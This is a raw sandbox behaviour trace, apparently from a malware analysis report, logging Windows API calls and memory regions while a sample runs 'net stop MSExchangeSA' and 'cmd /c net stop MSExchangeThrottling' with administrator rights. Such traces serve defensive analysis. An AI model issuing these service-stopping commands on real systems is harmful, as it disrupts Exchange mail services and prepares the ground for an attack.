(_String1="accounts", _String2="MSExchangeSA") returned -12 [0140.976] _wcsicmp (_String1="computer", _String2="MSExchangeSA") returned -10 [0140.976] _wcsicmp (_String1="config", _String2="MSExchangeSA") returned -10 [0140.976] _wcsicmp (_String1="continue", _String2="MSExchangeSA") returned -10 [0140.976] _wcsicmp (_String1="cont", _String2="MSExchangeSA") returned -10 [0140.976] _wcsicmp (_String1="file", _String2="MSExchangeSA") returned -7 [0140.976] _wcsicmp (_String1="files", _String2="MSExchangeSA") returned -7 [0140.976] _wcsicmp (_String1="group", _String2="MSExchangeSA") returned -6 [0140.976] _wcsicmp (_String1="groups", _String2="MSExchangeSA") returned -6 [0140.976] _wcsicmp (_String1="help", _String2="MSExchangeSA") returned -5 [0140.976] _wcsicmp (_String1="helpmsg", _String2="MSExchangeSA") returned -5 [0140.976] _wcsicmp (_String1="localgroup", _String2="MSExchangeSA") returned -1 [0140.976] _wcsicmp (_String1="pause", _String2="MSExchangeSA") returned 3 [0140.976] _wcsicmp (_String1="session", _String2="MSExchangeSA") returned 6 [0140.976] _wcsicmp (_String1="sessions", _String2="MSExchangeSA") returned 6 [0140.976] _wcsicmp (_String1="sess", _String2="MSExchangeSA") returned 6 [0140.976] _wcsicmp (_String1="share", _String2="MSExchangeSA") returned 6 [0140.976] _wcsicmp (_String1="start", _String2="MSExchangeSA") returned 6 [0140.976] _wcsicmp (_String1="stats", _String2="MSExchangeSA") returned 6 [0140.976] _wcsicmp (_String1="statistics", _String2="MSExchangeSA") returned 6 [0140.976] _wcsicmp (_String1="stop", _String2="MSExchangeSA") returned 6 [0140.976] _wcsicmp (_String1="time", _String2="MSExchangeSA") returned 7 [0140.976] _wcsicmp (_String1="user", _String2="MSExchangeSA") returned 8 [0140.976] _wcsicmp (_String1="users", _String2="MSExchangeSA") returned 8 [0140.976] _wcsicmp (_String1="msg", _String2="MSExchangeSA") returned 2 [0140.976] _wcsicmp (_String1="messenger", _String2="MSExchangeSA") returned -14 [0140.976] _wcsicmp (_String1="receiver", _String2="MSExchangeSA") returned 5 [0140.976] _wcsicmp (_String1="rcv", _String2="MSExchangeSA") returned 5 [0140.976] _wcsicmp (_String1="netpopup", _String2="MSExchangeSA") returned 1 [0140.976] _wcsicmp (_String1="redirector", _String2="MSExchangeSA") returned 5 [0140.976] _wcsicmp (_String1="redir", _String2="MSExchangeSA") returned 5 [0140.976] _wcsicmp (_String1="rdr", _String2="MSExchangeSA") returned 5 [0140.976] _wcsicmp (_String1=0x1081ffc, _String2="MSExchangeSA") returned 10 [0140.976] _wcsicmp (_String1="work", _String2="MSExchangeSA") returned 10 [0140.976] _wcsicmp (_String1="wksta", _String2="MSExchangeSA") returned 10 [0140.976] _wcsicmp (_String1="prdr", _String2="MSExchangeSA") returned 3 [0140.977] _wcsicmp (_String1="devrdr", _String2="MSExchangeSA") returned -9 [0140.977] _wcsicmp (_String1="lanmanworkstation", _String2="MSExchangeSA") returned -1 [0140.977] _wcsicmp (_String1="server", _String2="MSExchangeSA") returned 6 [0140.977] _wcsicmp (_String1="svr", _String2="MSExchangeSA") returned 6 [0140.977] _wcsicmp (_String1="srv", _String2="MSExchangeSA") returned 6 [0140.977] _wcsicmp (_String1="lanmanserver", _String2="MSExchangeSA") returned -1 [0140.977] _wcsicmp (_String1="alerter", _String2="MSExchangeSA") returned -12 [0140.977] _wcsicmp (_String1="netlogon", _String2="MSExchangeSA") returned 1 [0140.977] _wcsupr (in: _String="MSExchangeSA" | out: _String="MSEXCHANGESA") returned="MSEXCHANGESA" [0140.977] OpenSCManagerW (lpMachineName=0x0, lpDatabaseName=0x0, dwDesiredAccess=0x80000000) returned 0x5272630 [0140.979] GetServiceKeyNameW (in: hSCManager=0x5272630, lpDisplayName="MSEXCHANGESA", lpServiceName=0x10a8cb0, lpcchBuffer=0xd5f77c | out: lpServiceName="", lpcchBuffer=0xd5f77c) returned 0 [0140.979] _wcsicmp (_String1="msg", _String2="MSEXCHANGESA") returned 2 [0140.979] _wcsicmp (_String1="messenger", _String2="MSEXCHANGESA") returned -14 [0140.979] _wcsicmp (_String1="receiver", _String2="MSEXCHANGESA") returned 5 [0140.979] _wcsicmp (_String1="rcv", _String2="MSEXCHANGESA") returned 5 [0140.979] _wcsicmp (_String1="redirector", _String2="MSEXCHANGESA") returned 5 [0140.979] _wcsicmp (_String1="redir", _String2="MSEXCHANGESA") returned 5 [0140.979] _wcsicmp (_String1="rdr", _String2="MSEXCHANGESA") returned 5 [0140.979] _wcsicmp (_String1="workstation", _String2="MSEXCHANGESA") returned 10 [0140.979] _wcsicmp (_String1="work", _String2="MSEXCHANGESA") returned 10 [0140.979] _wcsicmp (_String1="wksta", _String2="MSEXCHANGESA") returned 10 [0140.979] _wcsicmp (_String1="prdr", _String2="MSEXCHANGESA") returned 3 [0140.979] _wcsicmp (_String1="devrdr", _String2="MSEXCHANGESA") returned -9 [0140.979] _wcsicmp (_String1="lanmanworkstation", _String2="MSEXCHANGESA") returned -1 [0140.979] _wcsicmp (_String1="server", _String2="MSEXCHANGESA") returned 6 [0140.979] _wcsicmp (_String1="svr", _String2="MSEXCHANGESA") returned 6 [0140.979] _wcsicmp (_String1="srv", _String2="MSEXCHANGESA") returned 6 [0140.979] _wcsicmp (_String1="lanmanserver", _String2="MSEXCHANGESA") returned -1 [0140.979] _wcsicmp (_String1="alerter", _String2="MSEXCHANGESA") returned -12 [0140.979] _wcsicmp (_String1="netlogon", _String2="MSEXCHANGESA") returned 1 [0140.979] _wcsicmp (_String1="MSEXCHANGESA", _String2="WORKSTATION") returned -10 [0140.979] _wcsicmp (_String1="MSEXCHANGESA", _String2="LanmanWorkstation") returned 1 [0140.979] _wcsicmp (_String1="MSEXCHANGESA", _String2="SERVER") returned -6 [0140.979] _wcsicmp (_String1="MSEXCHANGESA", _String2="LanmanServer") returned 1 [0140.979] _wcsicmp (_String1="MSEXCHANGESA", _String2="BROWSER") returned 11 [0140.979] _wcsicmp (_String1="MSEXCHANGESA", _String2="BROWSER") returned 11 [0140.979] _wcsicmp (_String1="MSEXCHANGESA", _String2="MESSENGER") returned 14 [0140.979] _wcsicmp (_String1="MSEXCHANGESA", _String2="MESSENGER") returned 14 [0140.980] _wcsicmp (_String1="MSEXCHANGESA", _String2="NETRUN") returned -1 [0140.980] _wcsicmp (_String1="MSEXCHANGESA", _String2="NETRUN") returned -1 [0140.980] _wcsicmp (_String1="MSEXCHANGESA", _String2="SPOOLER") returned -6 [0140.980] _wcsicmp (_String1="MSEXCHANGESA", _String2="SPOOLER") returned -6 [0140.980] _wcsicmp (_String1="MSEXCHANGESA", _String2="ALERTER") returned 12 [0140.980] _wcsicmp (_String1="MSEXCHANGESA", _String2="ALERTER") returned 12 [0140.980] _wcsicmp (_String1="MSEXCHANGESA", _String2="NETLOGON") returned -1 [0140.980] _wcsicmp (_String1="MSEXCHANGESA", _String2="NETLOGON") returned -1 [0140.980] _wcsicmp (_String1="MSEXCHANGESA", _String2="NETPOPUP") returned -1 [0140.980] _wcsicmp (_String1="MSEXCHANGESA", _String2="NETPOPUP") returned -1 [0140.980] _wcsicmp (_String1="MSEXCHANGESA", _String2="SQLSERVER") returned -6 [0140.980] _wcsicmp (_String1="MSEXCHANGESA", _String2="SQLSERVER") returned -6 [0140.980] _wcsicmp (_String1="MSEXCHANGESA", _String2="REPLICATOR") returned -5 [0140.980] _wcsicmp (_String1="MSEXCHANGESA", _String2="REPLICATOR") returned -5 [0140.980] _wcsicmp (_String1="MSEXCHANGESA", _String2="REMOTEBOOT") returned -5 [0140.980] _wcsicmp (_String1="MSEXCHANGESA", _String2="REMOTEBOOT") returned -5 [0140.980] _wcsicmp (_String1="MSEXCHANGESA", _String2="TIMESOURCE") returned -7 [0140.980] _wcsicmp (_String1="MSEXCHANGESA", _String2="TIMESOURCE") returned -7 [0140.980] _wcsicmp (_String1="MSEXCHANGESA", _String2="AFP") returned 12 [0140.980] _wcsicmp (_String1="MSEXCHANGESA", _String2="AFP") returned 12 [0140.980] _wcsicmp (_String1="MSEXCHANGESA", _String2="UPS") returned -8 [0140.980] _wcsicmp (_String1="MSEXCHANGESA", _String2="UPS") returned -8 [0140.980] _wcsicmp (_String1="MSEXCHANGESA", _String2="XACTSRV") returned -11 [0140.980] _wcsicmp (_String1="MSEXCHANGESA", _String2="XACTSRV") returned -11 [0140.980] _wcsicmp (_String1="MSEXCHANGESA", _String2="TCPIP") returned -7 [0140.980] _wcsicmp (_String1="MSEXCHANGESA", _String2="TCPIP") returned -7 [0140.980] OpenSCManagerW (lpMachineName=0x0, lpDatabaseName=0x0, dwDesiredAccess=0x1) returned 0x5273758 [0140.980] OpenServiceW (hSCManager=0x5273758, lpServiceName="MSEXCHANGESA", dwDesiredAccess=0x84) returned 0x0 [0140.980] GetLastError () returned 0x424 [0140.980] CloseServiceHandle (hSCObject=0x5273758) returned 1 [0140.981] wcscpy_s (in: _Destination=0x10a7698, _SizeInWords=0x104, _Source="NETMSG" | out: _Destination="NETMSG") returned 0x0 [0140.981] LoadLibraryW (lpLibFileName="NETMSG") returned 0xf10000 [0140.981] FormatMessageW (in: dwFlags=0x2a00, lpSource=0xf10000, dwMessageId=0x889, dwLanguageId=0x0, lpBuffer=0x10a7ca8, nSize=0x800, Arguments=0x10a7450 | out: lpBuffer="The service name is invalid.\r\n") returned 0x1e [0140.982] GetFileType (hFile=0x40) returned 0x2 [0140.982] GetConsoleMode (in: hConsoleHandle=0x40, lpMode=0xd5f618 | out: lpMode=0xd5f618) returned 1 [0140.983] WriteConsoleW (in: hConsoleOutput=0x40, lpBuffer=0x10a7ca8*, nNumberOfCharsToWrite=0x1e, lpNumberOfCharsWritten=0xd5f624, lpReserved=0x0 | out: lpBuffer=0x10a7ca8*, lpNumberOfCharsWritten=0xd5f624*=0x1e) returned 1 [0140.983] GetFileType (hFile=0x40) returned 0x2 [0140.983] GetConsoleMode (in: hConsoleHandle=0x40, lpMode=0xd5f618 | out: lpMode=0xd5f618) returned 1 [0140.983] WriteConsoleW (in: hConsoleOutput=0x40, lpBuffer=0x1081250*, nNumberOfCharsToWrite=0x2, lpNumberOfCharsWritten=0xd5f624, lpReserved=0x0 | out: lpBuffer=0x1081250*, lpNumberOfCharsWritten=0xd5f624*=0x2) returned 1 [0140.983] _ultow (in: _Dest=0x889, _Radix=14022200 | out: _Dest=0x889) returned="2185" [0140.983] FormatMessageW (in: dwFlags=0x2800, lpSource=0xf10000, dwMessageId=0xdba, dwLanguageId=0x0, lpBuffer=0x10a7ca8, nSize=0x800, Arguments=0x10a7450 | out: lpBuffer="More help is available by typing NET HELPMSG 2185.\r\n") returned 0x34 [0140.984] GetFileType (hFile=0x40) returned 0x2 [0140.984] GetConsoleMode (in: hConsoleHandle=0x40, lpMode=0xd5f608 | out: lpMode=0xd5f608) returned 1 [0140.984] WriteConsoleW (in: hConsoleOutput=0x40, lpBuffer=0x10a7ca8*, nNumberOfCharsToWrite=0x34, lpNumberOfCharsWritten=0xd5f614, lpReserved=0x0 | out: lpBuffer=0x10a7ca8*, lpNumberOfCharsWritten=0xd5f614*=0x34) returned 1 [0140.984] GetFileType (hFile=0x40) returned 0x2 [0140.984] GetConsoleMode (in: hConsoleHandle=0x40, lpMode=0xd5f608 | out: lpMode=0xd5f608) returned 1 [0140.984] WriteConsoleW (in: hConsoleOutput=0x40, lpBuffer=0x1081250*, nNumberOfCharsToWrite=0x2, lpNumberOfCharsWritten=0xd5f614, lpReserved=0x0 | out: lpBuffer=0x1081250*, lpNumberOfCharsWritten=0xd5f614*=0x2) returned 1 [0140.984] NetApiBufferFree (Buffer=0x5278488) returned 0x0 [0140.984] NetApiBufferFree (Buffer=0x52785d8) returned 0x0 [0140.984] GetCommandLineW () returned="C:\\Windows\\system32\\net1 stop MSExchangeSA" [0140.984] exit (_Code=2) Thread: id = 757 os_tid = 0xd44 Process: id = "261" image_name = "cmd.exe" filename = "c:\\windows\\syswow64\\cmd.exe" page_root = "0xc05000" os_pid = "0x764" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "1" os_parent_pid = "0xb54" cmd_line = "/c net stop MSExchangeThrottling" cur_dir = "C:\\Users\\CIiHmnxMn6Ps\\Desktop\\" os_username = "LHNIWSJ\\CIiHmnxMn6Ps" os_groups = "LHNIWSJ\\Domain Users" [0x7], "Everyone" [0x7], "NT AUTHORITY\\Local account and member of Administrators group" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Local account" [0x7], "NT AUTHORITY\\Logon Session 00000000:0001714b" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Region: id = 12425 start_va = 0x3c0000 end_va = 0x40ffff entry_point = 0x3c0000 region_type = mapped_file name = "cmd.exe" filename = "\\Windows\\SysWOW64\\cmd.exe" (normalized: "c:\\windows\\syswow64\\cmd.exe") Region: id = 12426 start_va = 0x700000 end_va = 0x46fffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000700000" filename = "" Region: id = 12427 start_va = 0x4700000 end_va = 0x471ffff entry_point = 0x0 region_type = private name = "private_0x0000000004700000" filename = "" Region: id = 12428 start_va = 0x4720000 end_va = 0x4720fff entry_point = 0x0 region_type = private name = "private_0x0000000004720000" filename = "" Region: id = 12429 start_va = 0x4730000 end_va = 0x4743fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000004730000" filename = "" Region: id = 12430 start_va = 0x4750000 end_va = 0x478ffff entry_point = 0x0 region_type = private name = "private_0x0000000004750000" filename = "" Region: id = 12431 start_va = 0x4790000 end_va = 0x488ffff entry_point = 0x0 region_type = private name = "private_0x0000000004790000" filename = "" Region: id = 12432 start_va = 0x4890000 end_va = 0x4893fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000004890000" filename = "" Region: id = 12433 start_va = 0x48a0000 end_va = 0x48a0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000048a0000" filename = "" Region: id = 12434 start_va = 0x48b0000 end_va = 0x48b1fff entry_point = 0x0 region_type = private name = "private_0x00000000048b0000" filename = "" Region: id = 12435 start_va = 0x77c40000 end_va = 0x77db8fff entry_point = 0x77c40000 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\SysWOW64\\ntdll.dll" (normalized: "c:\\windows\\syswow64\\ntdll.dll") Region: id = 12436 start_va = 0x7f500000 end_va = 0x7f522fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007f500000" filename = "" Region: id = 12437 start_va = 0x7f523000 end_va = 0x7f523fff entry_point = 0x0 region_type = private name = "private_0x000000007f523000" filename = "" Region: id = 12438 start_va = 0x7f52b000 end_va = 0x7f52dfff entry_point = 0x0 region_type = private name = "private_0x000000007f52b000" filename = "" Region: id = 12439 start_va = 0x7f52e000 end_va = 0x7f52efff entry_point = 0x0 region_type = private name = "private_0x000000007f52e000" filename = "" Region: id = 12440 start_va = 0x7ffe0000 end_va = 0x7ffeffff entry_point = 0x0 region_type = private name = "private_0x000000007ffe0000" filename = "" Region: id = 12441 start_va = 0x7fff0000 end_va = 0x7dfc03e6ffff entry_point = 0x0 region_type = private name = "private_0x000000007fff0000" filename = "" Region: id = 12442 start_va = 0x7dfc03e70000 end_va = 0x7ffc03e6ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00007dfc03e70000" filename = "" Region: id = 12443 start_va = 0x7ffc03e70000 end_va = 0x7ffc04031fff entry_point = 0x7ffc03e70000 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll") Region: id = 12444 start_va = 0x7ffc04032000 end_va = 0x7ffffffeffff entry_point = 0x0 region_type = private name = "private_0x00007ffc04032000" filename = "" Region: id = 12445 start_va = 0x4a70000 end_va = 0x4a7ffff entry_point = 0x0 region_type = private name = "private_0x0000000004a70000" filename = "" Region: id = 12446 start_va = 0x59300000 end_va = 0x5934efff entry_point = 0x59300000 region_type = mapped_file name = "wow64.dll" filename = "\\Windows\\System32\\wow64.dll" (normalized: "c:\\windows\\system32\\wow64.dll") Region: id = 12447 start_va = 0x59360000 end_va = 0x593d2fff entry_point = 0x59360000 region_type = mapped_file name = "wow64win.dll" filename = "\\Windows\\System32\\wow64win.dll" (normalized: "c:\\windows\\system32\\wow64win.dll") Region: id = 12448 start_va = 0x4b60000 end_va = 0x4c5ffff entry_point = 0x0 region_type = private name = "private_0x0000000004b60000" filename = "" Region: id = 12449 start_va = 0x59350000 end_va = 0x59357fff entry_point = 0x59350000 region_type = mapped_file name = "wow64cpu.dll" filename = "\\Windows\\System32\\wow64cpu.dll" (normalized: "c:\\windows\\system32\\wow64cpu.dll") Region: id = 12490 start_va = 0x4700000 end_va = 0x470ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000004700000" filename = "" Region: id = 12491 start_va = 0x48c0000 end_va = 0x497dfff entry_point = 0x48c0000 region_type = mapped_file name = "locale.nls" filename = "\\Windows\\System32\\locale.nls" (normalized: "c:\\windows\\system32\\locale.nls") Region: id = 12492 start_va = 0x4980000 end_va = 0x49bffff entry_point = 0x0 region_type = private name = "private_0x0000000004980000" filename = "" Region: id = 12493 start_va = 0x4c60000 end_va = 0x4d5ffff entry_point = 0x0 region_type = private name = "private_0x0000000004c60000" filename = "" Region: id = 12494 start_va = 0x4ed0000 end_va = 0x4edffff entry_point = 0x0 region_type = private name = "private_0x0000000004ed0000" filename = "" Region: id = 12495 start_va = 0x76970000 end_va = 0x76ae5fff entry_point = 0x76970000 region_type = mapped_file name = "kernelbase.dll" filename = "\\Windows\\SysWOW64\\KernelBase.dll" (normalized: "c:\\windows\\syswow64\\kernelbase.dll") Region: id = 12496 start_va = 0x77670000 end_va = 0x7775ffff entry_point = 0x77670000 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\SysWOW64\\kernel32.dll" (normalized: "c:\\windows\\syswow64\\kernel32.dll") Region: id = 12497 start_va = 0x77a10000 end_va = 0x77acdfff entry_point = 0x77a10000 region_type = mapped_file name = "msvcrt.dll" filename = "\\Windows\\SysWOW64\\msvcrt.dll" (normalized: "c:\\windows\\syswow64\\msvcrt.dll") Region: id = 12498 start_va = 0x7f400000 end_va = 0x7f4fffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007f400000" filename = "" Region: id = 12499 start_va = 0x7f528000 end_va = 0x7f52afff entry_point = 0x0 region_type = private name = "private_0x000000007f528000" filename = "" Region: id = 12500 start_va = 0x4710000 end_va = 0x4713fff entry_point = 0x0 region_type = private name = "private_0x0000000004710000" filename = "" Region: id = 12501 start_va = 0x4720000 end_va = 0x4723fff entry_point = 0x0 region_type = private name = "private_0x0000000004720000" filename = "" Region: id = 12502 start_va = 0x4ee0000 end_va = 0x5216fff entry_point = 0x4ee0000 region_type = mapped_file name = "sortdefault.nls" filename = "\\Windows\\Globalization\\Sorting\\SortDefault.nls" (normalized: "c:\\windows\\globalization\\sorting\\sortdefault.nls") Thread: id = 758 os_tid = 0xd38 [0141.150] GetModuleHandleA (lpModuleName=0x0) returned 0x3c0000 [0141.150] __set_app_type (_Type=0x1) [0141.150] __p__fmode () returned 0x77ac4d6c [0141.150] __p__commode () returned 0x77ac5b1c [0141.150] SetUnhandledExceptionFilter (lpTopLevelExceptionFilter=0x3d36e0) returned 0x0 [0141.150] __getmainargs (in: _Argc=0x3e50e8, _Argv=0x3e50ec, _Env=0x3e50f0, _DoWildCard=0, _StartInfo=0x3e50fc | out: _Argc=0x3e50e8, _Argv=0x3e50ec, _Env=0x3e50f0) returned 0 [0141.151] GetCurrentThreadId () returned 0xd38 [0141.151] OpenThread (dwDesiredAccess=0x1fffff, bInheritHandle=0, dwThreadId=0xd38) returned 0x84 [0141.151] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x77670000 [0141.151] GetProcAddress (hModule=0x77670000, lpProcName="SetThreadUILanguage") returned 0x776b2780 [0141.151] SetThreadUILanguage (LangId=0x0) returned 0x409 [0141.155] HeapSetInformation (HeapHandle=0x0, HeapInformationClass=0x1, HeapInformation=0x0, HeapInformationLength=0x0) returned 1 [0141.155] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="Software\\Policies\\Microsoft\\Windows\\System", ulOptions=0x0, samDesired=0x20019, phkResult=0x488f7fc | out: phkResult=0x488f7fc*=0x0) returned 0x2 [0141.155] VirtualQuery (in: lpAddress=0x488f803, lpBuffer=0x488f7b4, dwLength=0x1c | out: lpBuffer=0x488f7b4*(BaseAddress=0x488f000, AllocationBase=0x4790000, AllocationProtect=0x4, RegionSize=0x1000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0141.155] VirtualQuery (in: lpAddress=0x4790000, lpBuffer=0x488f7b4, dwLength=0x1c | out: lpBuffer=0x488f7b4*(BaseAddress=0x4790000, AllocationBase=0x4790000, AllocationProtect=0x4, RegionSize=0x1000, State=0x2000, Protect=0x0, Type=0x20000)) returned 0x1c [0141.155] VirtualQuery (in: lpAddress=0x4791000, lpBuffer=0x488f7b4, dwLength=0x1c | out: lpBuffer=0x488f7b4*(BaseAddress=0x4791000, AllocationBase=0x4790000, AllocationProtect=0x4, RegionSize=0x2000, State=0x1000, Protect=0x104, Type=0x20000)) returned 0x1c [0141.156] VirtualQuery (in: lpAddress=0x4793000, lpBuffer=0x488f7b4, dwLength=0x1c | out: lpBuffer=0x488f7b4*(BaseAddress=0x4793000, AllocationBase=0x4790000, AllocationProtect=0x4, RegionSize=0xfd000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0141.156] VirtualQuery (in: lpAddress=0x4890000, lpBuffer=0x488f7b4, dwLength=0x1c | out: lpBuffer=0x488f7b4*(BaseAddress=0x4890000, AllocationBase=0x4890000, AllocationProtect=0x2, RegionSize=0x4000, State=0x1000, Protect=0x2, Type=0x40000)) returned 0x1c [0141.156] GetConsoleOutputCP () returned 0x1b5 [0141.156] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x3ee460 | out: lpCPInfo=0x3ee460) returned 1 [0141.156] SetConsoleCtrlHandler (HandlerRoutine=0x3df980, Add=1) returned 1 [0141.156] _get_osfhandle (_FileHandle=1) returned 0x3c [0141.156] SetConsoleMode (hConsoleHandle=0x3c, dwMode=0x0) returned 1 [0141.156] _get_osfhandle (_FileHandle=1) returned 0x3c [0141.156] GetConsoleMode (in: hConsoleHandle=0x3c, lpMode=0x3ee40c | out: lpMode=0x3ee40c) returned 1 [0141.156] _get_osfhandle (_FileHandle=1) returned 0x3c [0141.156] SetConsoleMode (hConsoleHandle=0x3c, dwMode=0x3) returned 1 [0141.157] _get_osfhandle (_FileHandle=0) returned 0x38 [0141.157] GetConsoleMode (in: hConsoleHandle=0x38, lpMode=0x3ee408 | out: lpMode=0x3ee408) returned 1 [0141.157] _get_osfhandle (_FileHandle=0) returned 0x38 [0141.157] SetConsoleMode (hConsoleHandle=0x38, dwMode=0x1e7) returned 1 [0141.157] GetEnvironmentStringsW () returned 0x4b67d78* [0141.157] FreeEnvironmentStringsA (penv="A") returned 1 [0141.157] GetEnvironmentStringsW () returned 0x4b67d78* [0141.157] FreeEnvironmentStringsA (penv="A") returned 1 [0141.157] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="Software\\Microsoft\\Command Processor", ulOptions=0x0, samDesired=0x2000000, phkResult=0x488e760 | out: phkResult=0x488e760*=0x94) returned 0x0 [0141.157] RegQueryValueExW (in: hKey=0x94, lpValueName="DisableUNCCheck", lpReserved=0x0, lpType=0x488e764, lpData=0x488e76c, lpcbData=0x488e768*=0x1000 | out: lpType=0x488e764*=0x0, lpData=0x488e76c*=0xa8, lpcbData=0x488e768*=0x1000) returned 0x2 [0141.157] RegQueryValueExW (in: hKey=0x94, lpValueName="EnableExtensions", lpReserved=0x0, lpType=0x488e764, lpData=0x488e76c, lpcbData=0x488e768*=0x1000 | out: lpType=0x488e764*=0x4, lpData=0x488e76c*=0x1, lpcbData=0x488e768*=0x4) returned 0x0 [0141.157] RegQueryValueExW (in: hKey=0x94, lpValueName="DelayedExpansion", lpReserved=0x0, lpType=0x488e764, lpData=0x488e76c, lpcbData=0x488e768*=0x1000 | out: lpType=0x488e764*=0x0, lpData=0x488e76c*=0x1, lpcbData=0x488e768*=0x1000) returned 0x2 [0141.157] RegQueryValueExW (in: hKey=0x94, lpValueName="DefaultColor", lpReserved=0x0, lpType=0x488e764, lpData=0x488e76c, lpcbData=0x488e768*=0x1000 | out: lpType=0x488e764*=0x4, lpData=0x488e76c*=0x0, lpcbData=0x488e768*=0x4) returned 0x0 [0141.157] RegQueryValueExW (in: hKey=0x94, lpValueName="CompletionChar", lpReserved=0x0, lpType=0x488e764, lpData=0x488e76c, lpcbData=0x488e768*=0x1000 | out: lpType=0x488e764*=0x4, lpData=0x488e76c*=0x40, lpcbData=0x488e768*=0x4) returned 0x0 [0141.157] RegQueryValueExW (in: hKey=0x94, lpValueName="PathCompletionChar", lpReserved=0x0, lpType=0x488e764, lpData=0x488e76c, lpcbData=0x488e768*=0x1000 | out: lpType=0x488e764*=0x4, lpData=0x488e76c*=0x40, lpcbData=0x488e768*=0x4) returned 0x0 [0141.157] RegQueryValueExW (in: hKey=0x94, lpValueName="AutoRun", lpReserved=0x0, lpType=0x488e764, lpData=0x488e76c, lpcbData=0x488e768*=0x1000 | out: lpType=0x488e764*=0x0, lpData=0x488e76c*=0x40, lpcbData=0x488e768*=0x1000) returned 0x2 [0141.158] RegCloseKey (hKey=0x94) returned 0x0 [0141.158] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Command Processor", ulOptions=0x0, samDesired=0x2000000, phkResult=0x488e760 | out: phkResult=0x488e760*=0x94) returned 0x0 [0141.158] RegQueryValueExW (in: hKey=0x94, lpValueName="DisableUNCCheck", lpReserved=0x0, lpType=0x488e764, lpData=0x488e76c, lpcbData=0x488e768*=0x1000 | out: lpType=0x488e764*=0x0, lpData=0x488e76c*=0x40, lpcbData=0x488e768*=0x1000) returned 0x2 [0141.158] RegQueryValueExW (in: hKey=0x94, lpValueName="EnableExtensions", lpReserved=0x0, lpType=0x488e764, lpData=0x488e76c, lpcbData=0x488e768*=0x1000 | out: lpType=0x488e764*=0x4, lpData=0x488e76c*=0x1, lpcbData=0x488e768*=0x4) returned 0x0 [0141.158] RegQueryValueExW (in: hKey=0x94, lpValueName="DelayedExpansion", lpReserved=0x0, lpType=0x488e764, lpData=0x488e76c, lpcbData=0x488e768*=0x1000 | out: lpType=0x488e764*=0x0, lpData=0x488e76c*=0x1, lpcbData=0x488e768*=0x1000) returned 0x2 [0141.158] RegQueryValueExW (in: hKey=0x94, lpValueName="DefaultColor", lpReserved=0x0, lpType=0x488e764, lpData=0x488e76c, lpcbData=0x488e768*=0x1000 | out: lpType=0x488e764*=0x4, lpData=0x488e76c*=0x0, lpcbData=0x488e768*=0x4) returned 0x0 [0141.158] RegQueryValueExW (in: hKey=0x94, lpValueName="CompletionChar", lpReserved=0x0, lpType=0x488e764, lpData=0x488e76c, lpcbData=0x488e768*=0x1000 | out: lpType=0x488e764*=0x4, lpData=0x488e76c*=0x9, lpcbData=0x488e768*=0x4) returned 0x0 [0141.158] RegQueryValueExW (in: hKey=0x94, lpValueName="PathCompletionChar", lpReserved=0x0, lpType=0x488e764, lpData=0x488e76c, lpcbData=0x488e768*=0x1000 | out: lpType=0x488e764*=0x4, lpData=0x488e76c*=0x9, lpcbData=0x488e768*=0x4) returned 0x0 [0141.158] RegQueryValueExW (in: hKey=0x94, lpValueName="AutoRun", lpReserved=0x0, lpType=0x488e764, lpData=0x488e76c, lpcbData=0x488e768*=0x1000 | out: lpType=0x488e764*=0x0, lpData=0x488e76c*=0x9, lpcbData=0x488e768*=0x1000) returned 0x2 [0141.158] RegCloseKey (hKey=0x94) returned 0x0 [0141.158] time (in: timer=0x0 | out: timer=0x0) returned 0x5ad2983e [0141.158] srand (_Seed=0x5ad2983e) [0141.158] GetCommandLineW () returned="/c net stop MSExchangeThrottling" [0141.158] GetCommandLineW () returned="/c net stop MSExchangeThrottling" [0141.158] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x3f6720 | out: lpBuffer="C:\\Users\\CIiHmnxMn6Ps\\Desktop") returned 0x1d [0141.158] GetModuleFileNameW (in: hModule=0x0, lpFilename=0x4b69cd0, nSize=0x104 | out: lpFilename="C:\\Windows\\SysWOW64\\cmd.exe" (normalized: "c:\\windows\\syswow64\\cmd.exe")) returned 0x1b [0141.158] GetEnvironmentVariableW (in: lpName="PATH", lpBuffer=0x3ee4a0, nSize=0x2000 | out: lpBuffer="C:\\ProgramData\\Oracle\\Java\\javapath;C:\\Windows\\system32;C:\\Windows;C:\\Windows\\System32\\Wbem;C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\") returned 0x87 [0141.158] GetEnvironmentVariableW (in: lpName="PATHEXT", lpBuffer=0x3ee4a0, nSize=0x2000 | out: lpBuffer=".COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC") returned 0x35 [0141.158] GetEnvironmentVariableW (in: lpName="PROMPT", lpBuffer=0x3ee4a0, nSize=0x2000 | out: lpBuffer="") returned 0x0 [0141.158] _wcsicmp (_String1="PROMPT", _String2="CD") returned 13 [0141.158] _wcsicmp (_String1="PROMPT", _String2="ERRORLEVEL") returned 11 [0141.158] _wcsicmp (_String1="PROMPT", _String2="CMDEXTVERSION") returned 13 